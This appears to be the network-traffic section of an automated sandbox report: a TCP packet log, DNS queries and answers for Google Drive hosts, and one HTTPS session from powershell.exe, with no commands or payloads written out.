                                                                Mar 10, 2025 20:37:56.318646908 CET44349709172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:37:56.318938017 CET44349709172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:37:56.318985939 CET49709443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:37:56.318991899 CET44349709172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:37:56.319020987 CET44349709172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:37:56.319103003 CET49709443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:37:56.319113970 CET44349709172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:37:56.320527077 CET44349709172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:37:56.320561886 CET44349709172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:37:56.320609093 CET49709443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:37:56.320616007 CET44349709172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:37:56.320677042 CET49709443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:37:56.337512970 CET44349709172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:37:56.337558031 CET44349709172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:37:56.337611914 CET49709443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:37:56.337624073 CET44349709172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:37:56.338166952 CET49709443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:37:56.338213921 CET44349709172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:37:56.338303089 CET49709443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:38:56.069116116 CET49716443192.168.2.5142.250.181.238
                                                                Mar 10, 2025 20:38:56.069179058 CET44349716142.250.181.238192.168.2.5
                                                                Mar 10, 2025 20:38:56.069382906 CET49716443192.168.2.5142.250.181.238
                                                                Mar 10, 2025 20:38:56.086196899 CET49716443192.168.2.5142.250.181.238
                                                                Mar 10, 2025 20:38:56.086218119 CET44349716142.250.181.238192.168.2.5
                                                                Mar 10, 2025 20:38:58.118444920 CET44349716142.250.181.238192.168.2.5
                                                                Mar 10, 2025 20:38:58.118593931 CET49716443192.168.2.5142.250.181.238
                                                                Mar 10, 2025 20:38:58.119229078 CET44349716142.250.181.238192.168.2.5
                                                                Mar 10, 2025 20:38:58.119333982 CET49716443192.168.2.5142.250.181.238
                                                                Mar 10, 2025 20:38:58.167319059 CET49716443192.168.2.5142.250.181.238
                                                                Mar 10, 2025 20:38:58.167355061 CET44349716142.250.181.238192.168.2.5
                                                                Mar 10, 2025 20:38:58.167710066 CET44349716142.250.181.238192.168.2.5
                                                                Mar 10, 2025 20:38:58.170943975 CET49716443192.168.2.5142.250.181.238
                                                                Mar 10, 2025 20:38:58.173858881 CET49716443192.168.2.5142.250.181.238
                                                                Mar 10, 2025 20:38:58.220321894 CET44349716142.250.181.238192.168.2.5
                                                                Mar 10, 2025 20:38:58.946876049 CET44349716142.250.181.238192.168.2.5
                                                                Mar 10, 2025 20:38:58.946958065 CET44349716142.250.181.238192.168.2.5
                                                                Mar 10, 2025 20:38:58.947001934 CET49716443192.168.2.5142.250.181.238
                                                                Mar 10, 2025 20:38:58.947001934 CET49716443192.168.2.5142.250.181.238
                                                                Mar 10, 2025 20:38:58.956801891 CET49716443192.168.2.5142.250.181.238
                                                                Mar 10, 2025 20:38:58.956856966 CET44349716142.250.181.238192.168.2.5
                                                                Mar 10, 2025 20:38:58.985836029 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:38:58.985882998 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:38:58.985960960 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:38:58.986234903 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:38:58.986246109 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:01.306571960 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:01.306798935 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:01.315825939 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:01.315839052 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:01.316160917 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:01.316234112 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:01.316648960 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:01.364320040 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.373301983 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.373435974 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.373919010 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.373989105 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.436709881 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.436820984 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.458415031 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.458482027 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.518435001 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.518507957 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.536851883 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.536920071 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.536936998 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.536979914 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.540697098 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.540745020 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.540751934 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.540793896 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.567663908 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.567749977 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.567812920 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.567873955 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.567902088 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.567958117 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.567986012 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.568067074 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.568078041 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.568131924 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.573419094 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.573507071 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.573529005 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.573577881 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.579986095 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.580066919 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.580091000 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.580156088 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.586227894 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.586339951 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.586369991 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.586473942 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.614692926 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.614810944 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.614855051 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.614921093 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.617475986 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.617563009 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.617594957 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.617655039 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:04.624764919 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:04.624866009 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.019422054 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.019467115 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.019520998 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.020620108 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.020673990 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.022825956 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.022919893 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.022941113 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.022990942 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.023032904 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.023083925 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.023633003 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.023675919 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.023689032 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.023732901 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.033689022 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.033742905 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.033751011 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.033795118 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.033802032 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.033844948 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.061198950 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.061259985 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.061269045 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.061309099 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.061319113 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.061326027 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.061357975 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.061371088 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.061377048 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.061419964 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.061732054 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.061790943 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.061796904 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.061841011 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.061847925 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.061899900 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.061908007 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.061954975 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.062730074 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.062781096 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.062788963 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.062827110 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.062829018 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.062841892 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.062884092 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.062895060 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.062900066 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.062944889 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.063766956 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.063837051 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.064275980 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.064348936 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.064357042 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.064399004 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.064404964 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.064416885 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.064448118 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.064461946 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.067444086 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.067506075 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.067611933 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.067672014 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.087033033 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.087100029 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.087111950 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.087157965 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.087656021 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.087714911 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.087799072 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.087848902 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.089008093 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.089070082 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.089073896 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.089087963 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.089138031 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.090254068 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.090307951 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.090315104 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.090380907 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.091406107 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.091459036 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.091466904 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.091516972 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.092638016 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.092693090 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.092784882 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.092875957 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.107398033 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.107480049 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.107490063 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.107547045 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.108021975 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.108094931 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.108103037 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.108155012 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.108397007 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.108473063 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.108480930 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.108547926 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.109538078 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.109589100 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.109596014 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.109644890 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.110337019 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.110392094 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.110404968 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.110450983 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.111434937 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.111485004 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.111620903 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.111671925 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.112742901 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.112793922 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.112900019 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.112951040 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.131840944 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.131949902 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.131968021 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.132051945 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.132406950 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.132488012 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.132494926 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.132574081 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.133691072 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.133764982 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.133780003 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.133788109 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.133845091 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.133918047 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.134774923 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.134861946 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.135008097 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.135127068 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.135951042 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.136033058 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.136039019 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.136117935 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.143213034 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.143294096 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.143296003 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.143306017 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.143378973 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.144397020 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.144488096 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.144495964 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.144576073 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.147581100 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.147640944 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.147664070 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.147722006 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.147752047 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.147809029 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.147980928 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.148036957 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.148065090 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.148118019 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.148165941 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.148243904 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.159666061 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.159718037 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.159724951 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.159770966 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.159778118 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.159822941 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.160922050 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.160975933 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.160983086 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.161051035 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.162108898 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.162156105 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.162163973 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.162178993 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.162199020 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.162215948 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.163321018 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.163388014 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.163408041 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.163460016 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.173245907 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.173346043 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.175178051 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.175246000 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.175255060 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.175302029 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.175309896 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.175352097 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.176429987 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.176489115 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.176495075 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.176542044 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.177588940 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.177648067 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.177655935 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.177701950 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.178714991 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.178771019 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.178776979 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.178818941 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.192281008 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.192367077 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.208333969 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.208400965 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.208467007 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.208518028 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.208995104 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.209055901 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.209176064 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.209228992 CET49717443192.168.2.5172.217.16.193
                                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Mar 10, 2025 20:37:37.617556095 CET | 51762 | 53 | 192.168.2.5 | 1.1.1.1
                                                                Mar 10, 2025 20:37:37.627533913 CET | 53 | 51762 | 1.1.1.1 | 192.168.2.5
                                                                Mar 10, 2025 20:37:40.103723049 CET | 57174 | 53 | 192.168.2.5 | 1.1.1.1
                                                                Mar 10, 2025 20:37:40.110589981 CET | 53 | 57174 | 1.1.1.1 | 192.168.2.5
                                                                Mar 10, 2025 20:37:43.176711082 CET | 59691 | 53 | 192.168.2.5 | 1.1.1.1
                                                                Mar 10, 2025 20:37:43.184544086 CET | 53 | 59691 | 1.1.1.1 | 192.168.2.5
                                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                Mar 10, 2025 20:37:37.617556095 CET | 192.168.2.5 | 1.1.1.1 | 0xb94f | Standard query (0) | Host_6637.6637.6637.657e | A (IP address) | IN (0x0001) | false
                                                                Mar 10, 2025 20:37:40.103723049 CET | 192.168.2.5 | 1.1.1.1 | 0xa486 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                                                                Mar 10, 2025 20:37:43.176711082 CET | 192.168.2.5 | 1.1.1.1 | 0xfa2b | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                Mar 10, 2025 20:37:37.627533913 CET | 1.1.1.1 | 192.168.2.5 | 0xb94f | Name error (3) | Host_6637.6637.6637.657e | none | none | A (IP address) | IN (0x0001) | false
                                                                Mar 10, 2025 20:37:40.110589981 CET | 1.1.1.1 | 192.168.2.5 | 0xa486 | No error (0) | drive.google.com | | 142.250.181.238 | A (IP address) | IN (0x0001) | false
                                                                Mar 10, 2025 20:37:43.184544086 CET | 1.1.1.1 | 192.168.2.5 | 0xfa2b | No error (0) | drive.usercontent.google.com | | 172.217.16.193 | A (IP address) | IN (0x0001) | false
                                                                • drive.google.com
                                                                • drive.usercontent.google.com
                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                0 | 192.168.2.5 | 49707 | 142.250.181.238 | 443 | 7624 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Timestamp | Bytes transferred | Direction | Data
